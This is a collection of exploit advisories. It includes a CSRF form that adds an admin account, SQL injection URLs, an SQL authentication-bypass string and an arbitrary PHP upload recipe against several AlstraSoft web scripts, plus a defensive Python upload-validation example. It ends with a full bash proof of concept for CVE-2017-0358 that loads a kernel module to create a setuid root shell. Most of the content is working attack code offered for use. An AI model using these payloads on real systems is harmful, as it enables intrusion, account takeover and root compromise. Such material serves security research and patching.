# # # # #
# Exploit Title: AlstraSoft Flippa Clone MarketPlace v4.10 Script - Cross-Site Request Forgery (Add Admin)
# Google Dork: N/A
# Date: 04.02.2017
# Vendor Homepage: http://www.alstrasoft.com/
# Software Buy: http://www.alstrasoft.com/flippa-clone-marketplace.htm
# Demo: http://www.revou.com/flippa/
# Version: 4.10
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[beygir]ihsan[nokta]net
# # # # #
# SubAdmin Management [Add]:
<html>
<body>
<form name="frmSubadmin" action="http://localhost/[PATH]/subadminadd.php" method="POST" >
<td align="left" style="padding-left:15px" height="25" align="center">SubAdmin Management [Add]</td>
<input type="text" name="user_login" size="40" maxlength="50" class="textbox" value="">
<input type="password" name="user_passwd" size="40" maxlength="50" class="textbox" value="">
<input type="submit" name="Sumbit" value="Save" class="stdButton">
</form>
</body>
</html>
# # # # #
# # # # #
# Exploit Title: AlstraSoft Video Share Enterprise v4.72 Script - SQL Injection
# Google Dork: N/A
# Date: 04.02.2017
# Vendor Homepage: http://www.alstrasoft.com/
# Software Buy: http://www.alstrasoft.com/videoshare.htm
# Demo: http://www.alstrahost.com/vs/
# Version: 4.72
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[beygir]ihsan[nokta]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/album.php?UID=[SQL]
# http://localhost/[PATH]/uprofile.php?UID=[SQL]
# http://localhost/[PATH]/gmembers.php?urlkey=[URLKEY]&gid=[SQL]
# http://localhost/[PATH]/channel_detail.php?chid=[SQL]
# # # # #
# # # # #
# Exploit Title: AlstraSoft E-Friends v5.12 Script - SQL Injection
# Google Dork: N/A
# Date: 04.02.2017
# Vendor Homepage: http://www.alstrasoft.com/
# Software Buy: http://www.alstrasoft.com/efriends.htm
# Demo: http://alstrahost.com/friends/
# Version: 5.12
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[beygir]ihsan[nokta]net
# # # # #
# SQL Injection/Exploit :
# Log in as a regular user.
# http://localhost/[PATH]/index.php?mode=forums&act=viewcat&seid=[SQL]
# http://localhost/[PATH]/index.php?mode=forums&act=viewforum&cats=[SQL]
# http://localhost/[PATH]/index.php?mode=forums&act=viewforum&cats=131&seid=[SQL]
# # # # #
# # # # #
# Exploit Title: Alstrasoft ProTaxi Enterprise v3.5 Script - Arbitrary File Upload
# Google Dork: N/A
# Date: 04.02.2017
# Vendor Homepage: http://www.alstrasoft.com/
# Software Buy: http://www.alstrasoft.com/protaxi-uber-clone.htm
# Demo: http://propertycarrots.com/taxi/public/user/signin
# Version: 3.5
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[beygir]ihsan[nokta]net
# # # # #
# Exploit :
# Register as a passenger member.
# http://localhost/[PATH]/public/user/signup
# Under "My Profile", upload a .php file (e.g. photo.php) as the profile photo.
# http://localhost/[PATH]/public/user/profile
# Right-click the displayed photo to find the path of the uploaded .php file.
# http://localhost/[PATH]/public/uploads/....php
# Note: uploading another picture deletes the previously uploaded .php file.
# # # # #
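The ProTaxi report above works because the profile-photo handler keeps the client's filename and stores it under a web-served, script-enabled directory. The following is an added example, not AlstraSoft code: one way a fixed upload handler could look, with an extension allowlist, a magic-byte check, a size bound and a server-chosen random filename. The helper names, the allowlist, the size limit and the assumption that upload_root is served without script handlers are all this example's own.

```python
import os
import secrets
import tempfile

# Added example, not AlstraSoft code. The vendor handler accepted a .php file
# as a "photo"; this version refuses anything that is not a real image and
# never lets the client choose the stored name.

# Magic bytes each allowed image format must start with.
MAGIC = {
    "jpg": b"\xff\xd8\xff",            # JPEG SOI marker
    "png": b"\x89PNG\r\n\x1a\n",       # PNG signature
    "gif": b"GIF8",                    # GIF87a / GIF89a
}
MAX_BYTES = 5 * 1024 * 1024            # assumed size limit


class UploadRejected(Exception):
    pass


def validate_profile_photo(filename, data):
    """Return the extension to store the file under, or raise UploadRejected.

    Checks: exactly one extension and it is on the allowlist (so neither
    shell.php nor shell.php.jpg passes; Apache with AddHandler can execute the
    latter), the body starts with that format's magic bytes, and the size is
    bounded. The client-supplied name is never used for anything else.
    """
    name = os.path.basename(filename)       # strip any directory component
    parts = name.lower().split(".")
    if len(parts) != 2 or not parts[0]:
        raise UploadRejected("filename must be name.ext: %r" % filename)
    ext = "jpg" if parts[1] == "jpeg" else parts[1]
    if ext not in MAGIC:
        raise UploadRejected("extension %r not allowed" % ext)
    if not data.startswith(MAGIC[ext]):
        raise UploadRejected("content does not match %s" % ext)
    if len(data) > MAX_BYTES:
        raise UploadRejected("file too large")
    return ext


def is_rejected(filename, data):
    """True if validate_profile_photo would refuse this upload."""
    try:
        validate_profile_photo(filename, data)
    except UploadRejected:
        return True
    return False


def store_profile_photo(upload_root, filename, data):
    """Validate, then write under a random server-chosen name; return that name.

    upload_root is assumed to be a directory the web server serves as static
    files only (no script handlers). The returned name is what the profile
    page should reference instead of the original filename.
    """
    ext = validate_profile_photo(filename, data)
    stored = "%s.%s" % (secrets.token_hex(16), ext)
    with open(os.path.join(upload_root, stored), "wb") as fh:
        fh.write(data)
    return stored


def demo():
    """Store a constructed JPEG stub in a temp dir and return the stored name."""
    root = tempfile.mkdtemp()
    jpeg = MAGIC["jpg"] + b"\xe0" + b"\x00" * 32     # constructed stub image
    return store_profile_photo(root, "me.jpg", jpeg)
```

Even with these checks, serve the upload directory with script execution disabled (for Apache, a Directory block with "php_admin_flag engine off" or "SetHandler default-handler"), because the allowlist only limits what the application stores, not what the web server is willing to execute.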
# # # # #
# Exploit Title: Alstrasoft EPay Enterprise v5.17 Script - SQL Injection
# Google Dork: N/A
# Date: 04.02.2017
# Vendor Homepage: http://www.alstrasoft.com/
# Software Buy: http://www.alstrasoft.com/epay_enterprise.htm
# Demo: http://blizsoft.com/enterprise/
# Version: 5.17
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[beygir]ihsan[nokta]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/members/userinfo.htm?id=[SQL]
# http://localhost/[PATH]/members/products.htm?id=[SQL]&action=update
# http://localhost/[PATH]/members/subscriptions.htm?id=[SQL]&action=update
# Authentication Bypass :
# http://localhost/[PATH]/members/login.htm and set Username:'or''=' and Password to 'or''=' and hit enter.
# # # # #
#!/bin/bash
echo "@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@"
echo "@ CVE-2017-0358, PoC by Kristian Erik Hermansen @"
echo "@ ntfs-3g local privilege escalation to root @"
echo "@ Credits to Google Project Zero @"
echo "@ Affects: Debian 9/8/7, Ubuntu, Gentoo, others @"
echo "@ Tested: Debian 9 (Stretch) @"
echo "@ Date: 2017-02-03 @"
echo "@ Link: https://goo.gl/A9I8Vq @"
echo "@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@"
echo "[*] Gathering environment info ..."
cwd="$(pwd)"
un="$(uname -r)"
dlm="$(pwd)/lib/modules"
dkf="$(pwd)/kernel/fs"
echo "[*] Creating kernel hijack directories ..."
mkdir -p "${dlm}"
mkdir -p "${dkf}"
echo "[*] Forging symlinks ..."
ln -sf "${cwd}" "${dlm}/${un}"
ln -sf "${cwd}" "${dkf}/fuse"
ln -sf cve_2017_0358.ko fuse.ko
echo "[*] Pulling in deps ... "
echo "[*] Building kernel module ... "
cat << 'EOF' > cve_2017_0358.c
#include <linux/module.h>
MODULE_LICENSE("CC");
MODULE_AUTHOR("kristian erik hermansen <kristian.hermansen+CVE-2017-0358@gmail.com>");
MODULE_DESCRIPTION("PoC for CVE-2017-0358 from Google Project Zero");
int init_module(void) {
printk(KERN_INFO "[!] Exploited CVE-2017-0358 successfully; may want to patch your system!\n");
char *envp[] = { "HOME=/tmp", NULL };
char *argv[] = { "/bin/sh", "-c", "/bin/cp /bin/sh /tmp/r00t; /bin/chmod u+s /tmp/r00t", NULL };
call_usermodehelper(argv[0], argv, envp, UMH_WAIT_EXEC);
char *argvv[] = { "/bin/sh", "-c", "/sbin/rmmod cve_2017_0358", NULL };
call_usermodehelper(argv[0], argvv, envp, UMH_WAIT_EXEC);
return 0;
}
void cleanup_module(void) {
printk(KERN_INFO "[*] CVE-2017-0358 exploit unloading ...\n");
}
EOF
cat << 'EOF' > Makefile
obj-m += cve_2017_0358.o
all:
	make -C /lib/modules/$(shell uname -r)/build M=$(PWD) modules
clean:
	make -C /lib/modules/$(shell uname -r)/build M=$(PWD) clean
EOF
make 1>/dev/null 2>/dev/null || echo "[-] FAILED: you need make / build tools"
cp "/lib/modules/${un}/modules.dep.bin" . || echo "[-] FAILED: linux-image location non-default?"
MODPROBE_OPTIONS="-v -d ${cwd}" ntfs-3g /dev/null /dev/null 1>/dev/null 2>/dev/null
/tmp/r00t -c 'whoami' | egrep -q 'root' && echo "[+] SUCCESS: You have root. Don't be evil :)"
/tmp/r00t
echo << 'EOF'
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@#+'@@@@@########@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@+++'';+'###''#'+'@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@#@@@@+@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@####'#@@#;;'+@@###@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@';;:,.``#@@@;`.:@',::'@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@;`......+;:;':..+:..'#@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@'.;,.,;;;....;,.'.,;+@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@';':..':......;.:,,'@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@#;..'`.,;:.`;,,.'@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@;..'..,#;..',.;#@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@#++''++#@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@;..':,....,',.'@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@#'::,,::::,,:;#@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@#';..;'.,.,.;'..'@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@+:::::::::::::::,;#@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@+;;;';'':,:'';'';;@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@;:::::::::::::::::::;@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@';;'+;';'''''';';;+@@@@@@@@@@@@@@@@@@@@@@@@@@@@@#,:::::;;;;;;;:::::::::#@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@:;,,;.,'..'.;,,,.;'@@@@@@@@@@@@@@@@@@@@@@@@@@@@+:::::;;;;;;;;;;;;;;:::,;@@@@@@@@@@@@@@@###@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@;;;.;:,'..'.,,'.';;@@@@@@@@@@@@@@@@@@@@@@@@@@@#::::;;;;;;;;;;;;'';;;;:::#@@@@@@@@@@#'::::::#@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@;;:,;::'::+,',':';;@@@@@@@@@@@@@@@@@@@@@@@@@@@::::;;;;;;;';;''''''';;::,'@@@@@@@@@+;;;:;;::;@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@#';;;;;;;;'';;;;;;::#@@@@@@@@@@@@@@@@@@@@@@@@@+,::;;''''';;;''''+''';;;:::#@@@@@@@;;;;;;;;;::@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@#;::::::;.`.,'@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@:::;'''''''';;''+''+++;;;;::+'@@@@@';;;;;;;;''+@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@',,..,#@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@#::;'''''''''';;'''' `+'';;:;;:@@@@+';;;;;;'';:#@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@++':..'@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@+:;;''''''';'';''''; :+'';;::;@@@@;;;;;;;''+'+@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@#::.,,#@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@':;;'''''''''';''''' ''''';::;@@@+''';;;+#++#@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@;.,,;@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@;:;;''''''''';;''';':.;+'';;;:;@@@'''':;'@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@##;;..:@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@;:;''++'''''''''';;''''''';;;;'@@@;''',:'@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@+;;;.,:@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@;;;''++''''''''';;;;'''''''''';@@#;'''.:'@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@#'...,,;@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@';;''++++'''''''''''''+++++++':@@@''''::+@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@;:,.,;+@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@+:;;''++++''''''''''''''++'''':@@@'''':;#@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@#';'#@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@::''''+++++'''''''''''''''''::@@@+''';;#@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@#@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@;;;'''+'+++''''''''''''''''':;@@@+''';;+@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@#@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@';;''++'+++++++'''''''''''';:'@@@#''';;;@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@#;;''+++++++''''''''''''''';:#@@@@''';;:#@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@;;'''+++'+++''+'+''''''''';:#@@@@'+'';:+@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@';;'+++++++++''''''+'''''';:@@@@@+''';;;@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@#;;''+++++++++'''+'''''''';:@@@@@#''';;;#@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@;;''++++++++''''''''''''';:@@@@@@'''';;#@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@+'''+++++'+++'''''''''''';:@@@@@@+''';;#@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@#'''++++++'++'''''''''''';:@@@@@@+''';;#@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@#'''+++'+'+'''''''''''''';:@@@@@@#''';;#@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@#'''++++''''''''''''''''';:#@@@@@#''';;#@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@#'''++++++''''''''''';''';;#@@@@@#''';;#@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@#'''++++++''''''''''''''';;+@@@@@#'';;;#@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@#''++++++''''''''';'''''';;;#@@@@''';:;#@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@+++@@@@@@+''++'+++'''''''''';'''''';:'##';';;:;;#@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@#+'++####';;;'+;';;:'@@@@'''+''+++'''''''''';;''''';:::;;;;;;;;'@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@+;;;;;;;;::;;;;;'''''';:+@@@;''+''+++''''';''';;;''''';::;;;;;;'''@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@#';;;;:;;;;:;;;;;;;;'''''';:+@#'+'+''++'''''';''';;;;''''';:;;;;''+#@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@';;;;;;;;;;;;;;;;;:;;;;'''''::#'''''''+++'''';;''';;,;''''';:'''+##@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@#;;;;;;;;;;';;''''';;;,,;''''';;''''''''+''''';;;'''';;;;;;';;;;'#@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@+;;;;;;;;''''''+'''''''''';'''''::'''''''+'''';;:;'''';;;;';+';;;+@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@#;;'';;'';;;'++++++++''''''';;''';''''';''+'''';;,;'++'';;;;;+'';;;#@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@';'';'::::;::::'#@#+''''''+''';'';'''';''++''';;::;+++'';;;;'++';;;:##@@@@@@@@@@@@@@@@@@@@@@@#'';::;'#@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@'''';:::;;;;;;;;:'@@@++';;'+'';''''''';'++''''';,;'+++''';;;'''+':;::+@@@@@@@@@@@@@@@@@@@##';;;;;;;;;::#@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@+''::;;;;;'''''';::#@#+'';;'+'';''''';''+''''';;:;'##++'';;;';#+'':;;;'##@@@@@@@@@@@@@@@#;;;;;;;;;;;:;::'@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@':;;;;;;;''++++';;:'@#+';;''''''''';''+''#+';;;;''+##+''';;;;'#++';;;;;;+#@@@@@@@@@@#';;;;''''';;;;;;;::;@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@';;;;;;;;;''++++++'';:'++''''+'';'';''++#@@+';;;;;++##++''''';:+@#+';;;;;;:::::;;;;:;;;;;;'''''''''';;;;::'@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@';;;;;;;;;;'+####+++''';;;;;;'++;'''''#+++@#+''';;'#@@#++'''''';:+@##+'';;;;;:;;;;;;;;;;';''''''''''''',:;;;#@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@+;;;;;;;'';'+@@@@##++++'+''';;;'+'''''#@@@@@#'''';;'@@@@#@##+'+'';:'#@#+'''';;;;;;;;;;;'''''''''++++++'';';;;'@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@;;;;';;;'''+@@@@@@###+++++'+;:;'++'';'+@@@#@+''';;;+@@@@@@@@+++'';;;;'++'''';;;;;;;'''''''''+++#@@@@#++++'';;;@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@;''';;'''+#@@@@@@@@###++####+''''+''''''''''''''';;#@@@@@@@@@#++'''''';;;:;;';;;::,;''''++++'';+@@@@@@#'++'';'@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@+'''''''#@@@@@@@@@@@########+++++++''''''''''''';;'@@@@@@@@@@@#+''''''''''''''';;;;:::##@@@@@@@@@@@@@@@@@@++'#@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@##+####@@@@@@@@@@@@@@@@@@@@@#'''#++''''''''''''';+@@@@@@@@@@@#++''''+++''''+'''';;;;::+@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@#+''''''''''''+@@@@@@@@@@@@@@###++++++'''+++''';;;;;:+@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@#+''''''''''#@@@@@@@@@@@@@@@@@@###+#+++++++'''';;;;::#@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@#++++#####@@@@@@@@@@@@@@@@@@@@@#+######+++++'';;;;;::@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@+';'+@@@@@@@@@@@@@@@@@@@@@@@@@@@###@@@###+++'''':;;;:'@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@#++#+##++'';:;;;;@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@####@++++''';;;'@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@#+++'''''#@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@#####@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
